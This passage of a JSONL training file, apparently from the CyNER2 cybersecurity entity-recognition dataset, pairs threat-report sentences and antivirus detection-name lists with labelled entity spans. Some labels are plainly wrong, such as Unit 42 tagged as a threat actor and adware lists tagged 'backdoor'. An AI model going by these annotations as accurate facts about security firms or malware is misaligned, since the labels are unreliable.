[[22, 35]]}, "info": {"id": "cyner2_train_003719", "source": "cyner2_train"}} {"text": "Package Name App Name com.whatsapp WhatsApp Messenger com.pugna.magiccall n/a org.telegram.messenger Telegram com.facebook.katana Facebook com.twitter.android Twitter jp.naver.line.android LINE : Free Calls & Messages com.instanza.cocovoice Coco com.beetalk BeeTalk com.gtomato.talkbox TalkBox Voice Messenger - PTT 
com.viber.voip Viber Messenger com.immomo.momo MOMO陌陌 com.facebook.orca Messenger – Text and Video Chat for Free com.skype.rover Skype ; 3rd party stores only Most of these apps are well established and available on Google Play , however , com.skype.rover appears to be available only on third-party app stores .", "spans": {"SYSTEM: WhatsApp": [[35, 43]], "SYSTEM: Messenger": [[44, 53], [300, 309], [337, 346], [388, 397]], "SYSTEM: Telegram": [[101, 109]], "SYSTEM: Facebook": [[130, 138]], "SYSTEM: Twitter": [[159, 166]], "SYSTEM: LINE": [[189, 193]], "SYSTEM: BeeTalk": [[258, 265]], "SYSTEM: TalkBox": [[286, 293]], "SYSTEM: Viber": [[331, 336]], "SYSTEM: MOMO陌陌": [[363, 369]], "SYSTEM: Skype": [[445, 450]], "SYSTEM: Google Play": [[532, 543]]}, "info": {"id": "cyner2_train_003720", "source": "cyner2_train"}} {"text": "The spear-phishing campaigns we detected use links to RAR-compressed executables and Microsoft Word attachments that exploit the CVE-2012-0158 vulnerability.", "spans": {"THREAT_ACTOR: spear-phishing campaigns": [[4, 28]], "MALWARE: exploit": [[117, 124]], "VULNERABILITY: vulnerability.": [[143, 157]]}, "info": {"id": "cyner2_train_003721", "source": "cyner2_train"}} {"text": "FireEye Labs recently identified a previously unobserved version of Ploutus, dubbed Ploutus-D, that interacts with KAL's Kalignite multivendor ATM platform.", "spans": {"ORGANIZATION: FireEye Labs": [[0, 12]], "MALWARE: Ploutus,": [[68, 76]], "MALWARE: Ploutus-D,": [[84, 94]], "ORGANIZATION: KAL's": [[115, 120]], "SYSTEM: Kalignite multivendor ATM platform.": [[121, 156]]}, "info": {"id": "cyner2_train_003723", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.6E79 Application.Bundler.InstallBrain.A Application.Bundler.InstallBrain.A Win32.Adware.InstallBrain.d Win.Adware.Installbrain-35 Win32.Application.InstallBrain.B not-a-virus:AdWare.Win32.BrainInst.u Application.Bundler.InstallBrain.A Trojan.Win32.Adw.crasga Application.Bundler.InstallBrain.A 
Application.Win32.InstallBrain.BL Trojan:W32/InstallBrain.A Adware.Downware.1295 Adware.BrainInst.Win32.32 AdWare.Win32.InstallBrain AdWare/BrainInst.dz W32.Adware.Installbrain GrayWare[AdWare:not-a-virus]/Win32.BrainInst.u TrojanDownloader:Win32/Brantall.B PUP.InstallBrain/Variant not-a-virus:AdWare.Win32.BrainInst.u AdWare.BrainInst PUP.Optional.InstallBrain Win32.Adware.Braininst.Wvas Adware.BrainInst!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003725", "source": "cyner2_train"}} {"text": "Interestingly, as part of the delivery mechanism, the malware is disguised as a base64 digital certificate and decoded via certutil.exe.", "spans": {"MALWARE: malware": [[54, 61]]}, "info": {"id": "cyner2_train_003730", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Backdoor.Zegost.B.5 Trojan/Redosdru.aw Backdoor.Bapkri TrojWare.Win32.GameThief.Magania.~NWABI Dialer.Bjlog Backdoor.Win32.Zegost!IK Backdoor/Win32.Bapkri Backdoor.Win32.Drwolf.fep Backdoor.Win32.Zegost W32/Bjlog.SMC!tr PSW.OnlineGames3.WQF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003731", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Banload.bppx Trojan.Win32.A.Downloader.279193 Trojan.Qhost.3874 Downloader.Banload.Win32.43263 Trojan[Downloader]/Win32.Banload Trojan-Downloader.Win32.Banload.bppx TrojanDownloader:Win32/Servi.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003732", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.Kryptik.qb Trojan:Win32/Sopinar.D SScope.Malware-Cryptor.Drixed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003734", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.FakeGom.13314 Backdoor.Miancha.r5 Backdoor.Miancha! 
W32/Backdoor2.HTKG Backdoor.Miancha TROJ_DROPPR.YZ Backdoor.Win32.Miancha.b Trojan.Win32.Miancha.dxrsks Backdoor.W32.Miancha.b!c Win32.Backdoor.Miancha.Jcq Backdoor:W32/Miancha.A BackDoor.Miancha.1 Backdoor.Miancha.Win32.4 TROJ_DROPPR.YZ W32/Backdoor.IZWZ-3837 Backdoor/Miancha.a TR/Miancha.A.1 Trojan:Win32/Miancha.A Backdoor.Miancha Backdoor.Win32.Miancha Backdoor.Win32.Miancha.b Win32/Backdoor.3e8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003735", "source": "cyner2_train"}} {"text": "To evade detection, this app was concealed as a legitimate app.", "spans": {}, "info": {"id": "cyner2_train_003736", "source": "cyner2_train"}} {"text": "In recent months, Unit 42 has observed a number of attacks that we attribute to this group.", "spans": {"THREAT_ACTOR: Unit 42": [[18, 25]], "ORGANIZATION: group.": [[85, 91]]}, "info": {"id": "cyner2_train_003737", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.System3YM.Worm Worm.Win32.AutoRun!O Worm.Tupym.A5 W32/Tupym.worm Worm.AutoRun.FLD Worm.Autorun.Win32.63738 Trojan.Heur.AutoIT.2 Win32.Trojan.WisdomEyes.16070401.9500.9892 W32.Svich Win32/Yahlover.PT WORM_SOHAND.SM Win.Worm.Autorun-313 Worm.Win32.AutoRun.fnc Trojan.Script.Autorun.ddaffd W32.W.AutoRun.llU2 TrojWare.Win32.Injector.XEM Trojan.StartPage.31354 WORM_SOHAND.SM BehavesLike.Win32.Tupym.tz Worm.Win32.AutoRun Worm:Win32/Tupym.A Worm:Win32/Tupym.A Worm.Win32.AutoRun.fnc HEUR/Fakon.mwf Worm.Win32.Autorun.fnc Trojan.Autorun!VgV/xk+eV94 W32/AutoVt.AAAD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003738", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.G.Door.2.0 Backdoor/W32.Hupigon.495616.Q Backdoor.G.Door.2.0 Backdoor/G_Door.20 Backdoor.G.Door.2.0 Trojan.Win32.GDoor.dhmh W32/GDoor.HMGD-8120 Backdoor.Trojan Win32/G_Door.A BKDR_GLACIER.A Trojan.G_Door.E Backdoor.Win32.G_Door.83 Backdoor.G_Door!J6XAtZWeqBw Backdoor.Win32.G-Door_20.Svr[h] Backdoor.W32.G_Door.20!c 
Backdoor.G.Door.2.0 Backdoor.Win32.G_Door.A Backdoor.G.Door.2.0 BackDoor.GDoor.20 Backdoor.GDoor.Win32.23 BKDR_GLACIER.A BackDoor-FR.svr W32/GDoor.D TR/GDoor.Srv W32/Gdoor.F!tr.bdr Trojan[Backdoor]/Win32.G_Door Backdoor.G.Door.2.0 BackDoor-FR.svr Backdoor.G_Door Bck/G_Door.I Win32.Backdoor.G_door.Szbj Backdoor.Win32.G_Door Backdoor.G.Door.2.0 Backdoor.Win32.G_Door.83 Win32/Trojan.a6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003740", "source": "cyner2_train"}} {"text": "Before we start dishing the details, there is going to be one main takeaway from this blog post: If you haven't already, update/patch your Adobe Flash now.", "spans": {"SYSTEM: Adobe Flash": [[139, 150]]}, "info": {"id": "cyner2_train_003741", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit/W97.CVE-2012-0158 Exp.OLE.CVE-2012-0158.E Win32.Exploit.CVE-2012-0158.l Doc.Exploit.CVE_2012_0158-17 Exploit.MSWord.CVE-2012-0158.de Exploit.ComObj.CVE-2012-0158.hzuf Exploit.WORD.CVE-2012-0158.A EXPL_MSCOMCTL.A Trojan.EKOP-3 EXP/CVE-2012-0158.hgyuv Trojan[Exploit]/MSWord.CVE-2012-0158.de Exploit.MSWord.CVE-2012-0158.de Exploit.CVE-2012-0158 MSWord/Toolbar.A!exploit virus.exp.20120158", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003743", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Banito.AQ Backdoor.Banito.ae.n3 Backdoor/Banito.aq Backdoor.Banito!msfCf/FWzGs W32/Banito.AI BKDR_BANITO.BE Backdoor.Win32.Banito.bt Backdoor.Banito.AQ Backdoor.Win32.Banito Backdoor.Banito.AQ BackDoor.Faggoty BKDR_BANITO.BE Backdoor.Win32.Banito!IK Backdoor/Banito.ao Backdoor:Win32/Banito.D Backdoor.Win32.Banito.54784.F[UPX] Backdoor.Banito.AQ Win-Trojan/Banito.54784.D OScope.Backdoor.Banito.1 Backdoor.Win32.Banito W32/Banito.AJ!tr.bdr Bck/Banito.AT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003744", "source": "cyner2_train"}} {"text": "W32/NionSpy is a family of malware that steals information 
from infected machines and replicates to new machines over networks and removable thumb drives.", "spans": {"MALWARE: malware": [[27, 34]], "SYSTEM: machines": [[73, 81], [104, 112]], "SYSTEM: removable thumb drives.": [[131, 154]]}, "info": {"id": "cyner2_train_003745", "source": "cyner2_train"}} {"text": "Domain names registered by the Fancy Bear actor", "spans": {"THREAT_ACTOR: the Fancy Bear actor": [[27, 47]]}, "info": {"id": "cyner2_train_003746", "source": "cyner2_train"}} {"text": "Early in March, while studying the ChinaZ threat, it became readily apparent that default passwords were being used for more than just a supplementary attack vector.", "spans": {"THREAT_ACTOR: ChinaZ threat,": [[35, 49]]}, "info": {"id": "cyner2_train_003747", "source": "cyner2_train"}} {"text": "The vulnerability does not enable the execution of arbitrary code but the exploit was able to inject a JavaScript payload into the local file context.", "spans": {"VULNERABILITY: vulnerability": [[4, 17]], "VULNERABILITY: arbitrary code": [[51, 65]], "MALWARE: exploit": [[74, 81]], "VULNERABILITY: JavaScript": [[103, 113]], "MALWARE: payload": [[114, 121]]}, "info": {"id": "cyner2_train_003748", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Multi.Moridin!O W32.Moridin.B PE_MORIDIN.A Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Morodi.A PE_MORIDIN.A Win.Trojan.Morid-5 Virus.Multi.Moridin.b Win32.Moridin.A Virus.Multi.Moridin!c Heur.Packed.Unknown Win32.Moridin Virus.Moridin.Win32.2 BehavesLike.Win32.Ipamor.cm W32/Trojan.BIOB-8512 TR/Moridin.B.2 Win32.Multi.b.106496 Trojan.Heur.FU.EB24AD Virus.Multi.Moridin.b Virus.Multi.Moridin W32/Moridin.72192 Win32.Virus.Moridin.Dzkb IRC.Moridin.B Trojan-Dropper.Win32.Loring W32/Moridin.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003749", "source": "cyner2_train"}} {"text": "Multiple versions of Regin were found in the wild, targeting several corporations, institutions, academics, and 
individuals.", "spans": {"MALWARE: Regin": [[21, 26]], "ORGANIZATION: corporations, institutions, academics,": [[69, 107]], "ORGANIZATION: individuals.": [[112, 124]]}, "info": {"id": "cyner2_train_003750", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod90c.Trojan.0a13 Trojan.BHO.ODS Trojan-Clicker/W32.BHO.20480.L TrojanDropper.Nonaco Trojan.BHO Riskware.Win32.E404.fyxw W32/Downldr2.HQQK Win32/Puper.RK Trojan.BHO.ODS Adware.BHO!Ut7EPOdXbSM Adware.E404.20480.B Trojan.BHO.ODS Trojan.BHO.ODS Trojan.Popuper.43732 Spyware[AdWare:not-a-virus]/Win32.BHO TrojanDropper:Win32/Nonaco.C Trojan.BHO.ODS W32/Downloader.GJMR-1771 Trojan.Win32.Dbg AdWare.Win32.BHO.aNN Win32/BHO.NHP not-a-virus:AdWare.Win32.E404", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003752", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.RazyNHmA.Trojan Win32.Trojan.Kryptik.ayq TSPY_HPZBOT.SM1 TrojWare.Win32.DorkBot.LB TSPY_HPZBOT.SM1 BehavesLike.Win32.RansomTescrypt.ch Trojan.Win32.Crypt TR/Crypt.Xpack.itdny Trojan.Symmi.D1129F Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003753", "source": "cyner2_train"}} {"text": "Based on our research that we will further outline below, attackers behind the outages in two power facilities in Ukraine in December likely attempted similar attacks against a mining company and a large railway operator in Ukraine.", "spans": {"THREAT_ACTOR: attackers": [[58, 67]], "ORGANIZATION: power facilities": [[94, 110]], "ORGANIZATION: mining company": [[177, 191]], "ORGANIZATION: railway operator": [[204, 220]]}, "info": {"id": "cyner2_train_003754", "source": "cyner2_train"}} {"text": "The group behind these attacks is known as Dragonfly.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "THREAT_ACTOR: Dragonfly.": [[43, 53]]}, "info": {"id": "cyner2_train_003755", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.iStartSurf.1 
Application.iStartSurf.1 Win32.Trojan.WisdomEyes.16070401.9500.9915 NSIS/TrojanDownloader.Adload.AQ not-a-virus:HEUR:AdWare.Win32.AdLoad.heur Application.iStartSurf.1 Riskware.Nsis.Adload.dtchzc Adware.W32.Adload!c Trojan.Vittalia.1482 BehavesLike.Win32.AdwareAdload.tc TR/Dldr.Adload.1839597.7 TrojanDownloader:Win32/Quireap.A not-a-virus:HEUR:AdWare.Win32.AdLoad.heur PUP/Win32.Adload.R155445 Trj/CI.A NSIS.Adware.Adload.V", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003756", "source": "cyner2_train"}} {"text": "We have seen multiple Elirks variants using Japanese blog services for the last couple of years.", "spans": {"MALWARE: Elirks variants": [[22, 37]]}, "info": {"id": "cyner2_train_003757", "source": "cyner2_train"}} {"text": "Symantec telemetry revealed an exploit hosted on the compromised site, which was used to infect visitors with the Korplug back door detected by Symantec as Backdoor.Korplug.", "spans": {"ORGANIZATION: Symantec": [[0, 8], [144, 152]], "SYSTEM: telemetry": [[9, 18]], "MALWARE: exploit": [[31, 38]], "VULNERABILITY: compromised": [[53, 64]], "MALWARE: the Korplug back door": [[110, 131]]}, "info": {"id": "cyner2_train_003760", "source": "cyner2_train"}} {"text": "This campaign uses obfuscated variants of the HTTPBrowser tool that use DNS as a control channel.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "MALWARE: HTTPBrowser tool": [[46, 62]]}, "info": {"id": "cyner2_train_003761", "source": "cyner2_train"}} {"text": "STRONTIUM has been active since at least 2007.", "spans": {"THREAT_ACTOR: STRONTIUM": [[0, 9]]}, "info": {"id": "cyner2_train_003763", "source": "cyner2_train"}} {"text": "Check Point informed the Google Security team about the apps, which were then removed from Google Play.", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google Security team": [[25, 45]], "SYSTEM: apps,": [[56, 61]], "ORGANIZATION: Google Play.": [[91, 103]]}, "info": {"id": "cyner2_train_003765", "source": 
"cyner2_train"}} {"text": "Finally, this variant also contains an interesting piece of comment by the malware author written in the macro code, which made us feel obliged to take a closer look in the first place.", "spans": {}, "info": {"id": "cyner2_train_003766", "source": "cyner2_train"}} {"text": "APT groups from multiple countries - including China - have been known to target organizations of strategic interest with aggressive malware-based espionage campaigns.", "spans": {"THREAT_ACTOR: APT groups": [[0, 10]], "ORGANIZATION: organizations": [[81, 94]], "THREAT_ACTOR: malware-based espionage campaigns.": [[133, 167]]}, "info": {"id": "cyner2_train_003768", "source": "cyner2_train"}} {"text": "Back then, MELANI already took appropriate action together with the affected financial institutions and ISPs in Switzerland to mitigate the threat.", "spans": {"ORGANIZATION: MELANI": [[11, 17]], "ORGANIZATION: financial institutions": [[77, 99]], "ORGANIZATION: ISPs": [[104, 108]]}, "info": {"id": "cyner2_train_003769", "source": "cyner2_train"}} {"text": "Arsenal is currently developing a detailed case study related to our analysis of computers essential to the Odatv case in Turkey.", "spans": {"ORGANIZATION: Arsenal": [[0, 7]]}, "info": {"id": "cyner2_train_003771", "source": "cyner2_train"}} {"text": "Another day, another ransomware gang.", "spans": {"THREAT_ACTOR: ransomware gang.": [[21, 37]]}, "info": {"id": "cyner2_train_003772", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9780 BehavesLike.Win32.StartPage.th Trojan-Dropper.Win32.Autoit Trojan.AutoIT.7 TrojanDropper.Autit Autoit.Trojan.Heur.Sxyf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003773", "source": "cyner2_train"}} {"text": "This is the exact scenario we witnessed this week during an incident response procedure and that is detailed in this diary.", "spans": {}, "info": {"id": "cyner2_train_003774", "source": 
"cyner2_train"}} {"text": "Buckeye also known as APT3, Gothic Panda, UPS Team, and TG-0110 is a cyberespionage group that is believed to have been operating for well over half a decade.", "spans": {"THREAT_ACTOR: Buckeye": [[0, 7]], "THREAT_ACTOR: APT3, Gothic Panda, UPS Team,": [[22, 51]], "THREAT_ACTOR: TG-0110": [[56, 63]], "THREAT_ACTOR: cyberespionage group": [[69, 89]]}, "info": {"id": "cyner2_train_003776", "source": "cyner2_train"}} {"text": "Looking at the characteristics of the tool, we suspect that it has been prepared for the purpose of corporate espionage.", "spans": {"MALWARE: tool,": [[38, 43]], "THREAT_ACTOR: corporate espionage.": [[100, 120]]}, "info": {"id": "cyner2_train_003777", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoA.29F2 Backdoor.Win32.Poison!O TrojanDropper.VB BKDR_POISON.IRE Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/IRCBot.ACS BKDR_POISON.IRE Trojan-Dropper.Win32.VB.cwek Trojan.Win32.Poison.cqxwv Backdoor.Win32.Poison.146621 Backdoor.W32.Poison.bfjd!c Backdoor.Win32.Poison.fh Trojan.VbCrypt.68 Backdoor.Poison.Win32.31435 BehavesLike.Win32.Autorun.ch Backdoor/Poison.goa Trojan[Backdoor]/Win32.Poison Trojan-Dropper.Win32.VB.cwek Worm:Win32/Neubreku.C SIM.Trojan.VBO.02298 Bck/Poison.AK Win32.Trojan-dropper.Vb.Aenv Backdoor.Win32.Bifrose W32/VBInjector.W!tr Win32/Trojan.Dropper.b73", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003778", "source": "cyner2_train"}} {"text": "RATs, such as H-W0rm, njRAT, KilerRAT, DarkComet, Netwire, XtremeRAT, JSocket/AlienSpy/Adwind and others, hold special interest for the Threat Research Team at Fidelis Cybersecurity.", "spans": {"MALWARE: RATs,": [[0, 5]], "MALWARE: H-W0rm, njRAT, KilerRAT, DarkComet, Netwire, XtremeRAT, JSocket/AlienSpy/Adwind": [[14, 93]], "ORGANIZATION: the Threat Research Team": [[132, 156]], "ORGANIZATION: Fidelis Cybersecurity.": [[160, 182]]}, "info": {"id": "cyner2_train_003779", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Android.Trojan.RootSmart.A Android.GGSmart.A Android.Malware.Trojan A.H.Rog.RootSmart.B Android.Trojan.GGSmart.d AndroidOS/GGSmart.A AndroidOS_RootSmart.D Android.Trojan.RootSmart.A HEUR:Backdoor.AndroidOS.RootSmart.a Android.Trojan.RootSmart.A Trojan.Android.RootSmart.bdbwsm Riskware.Android.FakeInstall.jab Trojan-Downloader:Android/RootSmart.A Android.Smart.4.origin AndroidOS_RootSmart.D AndroidOS/GGSmart.A Backdoor/AndroidOS.erl ANDROID/GGSmart.D.4 Trojan[Backdoor]/Android.RootSmart Android.Troj.GacBlocker.a.kcloud Android.Trojan.RootSmart.A HEUR:Backdoor.AndroidOS.RootSmart.a Android-Backdoor/RootSmart.1bb6 Android/GGSmart.D Trojan.AndroidOS.GGSmart Android/GGSmart.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003780", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.XML.CVE-2017-8570 W97M.Downloader Win32/Exploit.CVE-2017-8570.A TROJ_CVE20170199.JEJOPP Exploit.Xml.CVE-2017-0199.equmby PPT.S.Exploit.1356909 TROJ_CVE20170199.JEJOPP ZIP/Trojan.CGYR-2 XML/Dloader.S2 Exploit.CVE-2017-8570 MSOffice/Dloader!exploit.CVE20170199", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003781", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PasswordStealer Trojan.Win32.Ric.exqwlt Trojan.Win32.Z.Evrial.35328.F Trojan.MulDrop7.60168 Trojan.MSIL.PSW TrojanSpy:MSIL/Evrial.A!bit TScope.Trojan.MSIL Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003783", "source": "cyner2_train"}} {"text": "A backdoor also known as: Abuse-Worry/W32.NetPass.466944 Trojanspy.Vlogger.A3 Trojan/Spy.VB.nwb Trojan.Heur.RX.EB6D33 Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/VBInject.Stub Trojan.Win32.Diss.susqi Tool.NetPass.Win32.2684 Trojan[PSWTool]/Win32.NetPass PWS:Win32/Sifre.A Trojan.Win32.Diss.susqi Trojan/Win32.Sifre.R148157 Win32.Trojan.Diss.Lplb Riskware.PSWTool! 
Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003785", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit-CVE2012-0158.u Trojan.Mdropper TROJ_CVE20120158.MESD Exploit.Win32.CVE-2012-0158.aw Exploit.ComObj.CVE-2012-0158.hzuf Exploit.W32.Cve!c Exploit.Mht.1 TROJ_CVE20120158.MESD Trojan:Win32/Knonyme.CS!dha Exploit.WORD.CVE-2012-0158 Exploit.MSWord.CVE-2012-0158 Win32/Trojan.Exploit.a11", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003786", "source": "cyner2_train"}} {"text": "As 2016 comes to a close, we observe the same thing happening to another of Nintendo's game properties: Super Mario.", "spans": {"ORGANIZATION: Nintendo's": [[76, 86]], "SYSTEM: game properties: Super Mario.": [[87, 116]]}, "info": {"id": "cyner2_train_003787", "source": "cyner2_train"}} {"text": "According to SimilarWeb, these sites have a combined total of at least 50 million visitors per month.", "spans": {}, "info": {"id": "cyner2_train_003788", "source": "cyner2_train"}} {"text": "These emails contain misleading links that download malicious Zip files, which, in turn, contain a JavaScript file that downloads the TorrentLocker ransomware.", "spans": {"MALWARE: TorrentLocker ransomware.": [[134, 159]]}, "info": {"id": "cyner2_train_003789", "source": "cyner2_train"}} {"text": "Unit 42 has discovered a new cluster of malware samples, which targets Samsung devices and Korean language speakers, with relationships to the malware used in Operation Blockbuster.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: malware": [[40, 47]], "SYSTEM: Samsung devices": [[71, 86]], "ORGANIZATION: Korean language speakers,": [[91, 116]], "MALWARE: the malware": [[139, 150]], "THREAT_ACTOR: Operation Blockbuster.": [[159, 181]]}, "info": {"id": "cyner2_train_003791", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win.Trojan.Secrar-3 W32.W.Otwycal.l4av PUA.RiskWare.PEMalform Trojan:Win32/Secrar.A 
Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003792", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Scache.A Trojan.Scache.A Trojan.Scache.A Trojan.Scache.A Trojan.Dos.Scache.fnss TROJ_SCACHE.A Trojan.DOS.Scache Troj.DOS.Scache!c Trojan.Scache.A TrojWare.DOS.Scache Trojan.Scache.A Trojan.Cashe Trojan.Scache.DOS.2 TROJ_SCACHE.A TR/Scache.A W32/Scache.A!tr Trojan/DOS.Scache Trojan.Scache.A Dos.Trojan.Scache.Aguy Trojan.Scache.A Trojan.DOS.Scache.aa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003793", "source": "cyner2_train"}} {"text": "One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS.", "spans": {"MALWARE: malware": [[34, 41]], "SYSTEM: SNS.": [[129, 133]]}, "info": {"id": "cyner2_train_003794", "source": "cyner2_train"}} {"text": "This makes it a powerful tool for attackers.", "spans": {"THREAT_ACTOR: attackers.": [[34, 44]]}, "info": {"id": "cyner2_train_003795", "source": "cyner2_train"}} {"text": "The calls are almost certainly a pro-Russia propaganda effort designed to create negative political content about those who have spoken out against Russian President Vladimir Putin and, in the last year, opposed Russia's invasion of Ukraine.", "spans": {"ORGANIZATION: Russian President Vladimir Putin": [[148, 180]]}, "info": {"id": "cyner2_train_003797", "source": "cyner2_train"}} {"text": "While these attacks were covered extensively in the media, how the attackers stole these credentials and introduced W32.Disttrack on targeted organizations' networks remains a mystery.", "spans": {"THREAT_ACTOR: attackers": [[67, 76]], "ORGANIZATION: organizations' networks": [[142, 165]]}, "info": {"id": "cyner2_train_003798", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9990 W32.Sand.12300 Virus.Win32.HLLP.Alcaul.c 
Virus.Win32.HLLP.Alcaul.D Win32.HLLP.Alcopaul.12296 Win32.NGVCK.TTD Win32/HLLP.Alcaul.c W32/Alcaul.D Virus.Win32.HLLP.Alcaul.c Worm:Win32/Lopy.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003799", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Nioupale Trojan/Daserf.b Trojan.Heur.PT.E6A39B BKDR_DASERF.ZCEG-A Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_DASERF.ZCEG-A Trojan.Win32.Scar.hnib Trojan.Win32.Invader.ervtpc Troj.Dropper.W32.Small.kZ2V Trojan.Inject1.18880 BehavesLike.Win32.Backdoor.kh W32/Trojan.MWNM-9354 Trojan/Win32.Scar Backdoor:Win32/Nioupale.A Trojan.Win32.Scar.hnib Trojan/Win32.Scar.R68534 Trojan.Scar Win32.Trojan.Scar.Llhd W32/Scar.HNIB!tr Win32/Trojan.97a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003800", "source": "cyner2_train"}} {"text": "A backdoor also known as: MemScan:Backdoor.Hupigon.APH Win32.Backdoor.Hupigon.axbr.10 Backdoor.Graybird BKDR_HUPIGON.ASJ Backdoor.Win32.Hupigon.aha MemScan:Backdoor.Hupigon.APH MemScan:Backdoor.Hupigon.APH BackDoor.Pigeon.194 BKDR_HUPIGON.ASJ Backdoor.Win32.Hupigon!IK MemScan:Backdoor.Hupigon.APH Backdoor.Win32.Hupigon.cmpw Backdoor.Win32.Gpigeon2008.acj Backdoor.Win32.Hupigon BackDoor.Hupigon5.ARLC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003801", "source": "cyner2_train"}} {"text": "A backdoor also known as: WS.Reputation.1 Trojan.Strictor.D148BF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003802", "source": "cyner2_train"}} {"text": "It says those were sent in the report to the FBI.", "spans": {}, "info": {"id": "cyner2_train_003804", "source": "cyner2_train"}} {"text": "The experts of G DATA's SecurityLabs analyzed a specially crafted Microsoft Word document the attackers used to install a rather famous banking Trojan called Dridex.", "spans": {"ORGANIZATION: G DATA's SecurityLabs": [[15, 36]], "SYSTEM: Microsoft Word document": [[66, 89]], "THREAT_ACTOR: 
attackers": [[94, 103]], "MALWARE: banking Trojan": [[136, 150]], "MALWARE: Dridex.": [[158, 165]]}, "info": {"id": "cyner2_train_003805", "source": "cyner2_train"}} {"text": "Attackers, regardless of their skills and motives, often attempt to wrap malicious code in a way that will seem innocuous to practitioners and security products.", "spans": {"THREAT_ACTOR: Attackers,": [[0, 10]], "MALWARE: malicious code": [[73, 87]], "ORGANIZATION: practitioners": [[125, 138]], "SYSTEM: security products.": [[143, 161]]}, "info": {"id": "cyner2_train_003807", "source": "cyner2_train"}} {"text": "The vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents.", "spans": {"VULNERABILITY: vulnerability bypassed": [[4, 26]], "ORGANIZATION: FireEye": [[82, 89]], "SYSTEM: network products": [[100, 116]]}, "info": {"id": "cyner2_train_003808", "source": "cyner2_train"}} {"text": "This incident happened on an Android 6.0.1 device, owned by one of the company's Vice Presidents.", "spans": {"SYSTEM: Android 6.0.1 device,": [[29, 50]], "ORGANIZATION: the company's Vice Presidents.": [[67, 97]]}, "info": {"id": "cyner2_train_003809", "source": "cyner2_train"}} {"text": "Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details.", "spans": {"ORGANIZATION: Morphisec researchers": [[0, 21]], "MALWARE: attacks": [[46, 53]]}, "info": {"id": "cyner2_train_003810", "source": "cyner2_train"}} {"text": "This means the attacker can craft a phishing website without the user knowing it is visiting a phishing site.", "spans": {"THREAT_ACTOR: attacker": [[15, 23]]}, "info": {"id": "cyner2_train_003811", "source": "cyner2_train"}} {"text": "A backdoor also known as: PSWTool.Win32.Ophcrack!O Tool.Ophcrack.Win32.15 W32/MalwareF.MTNL 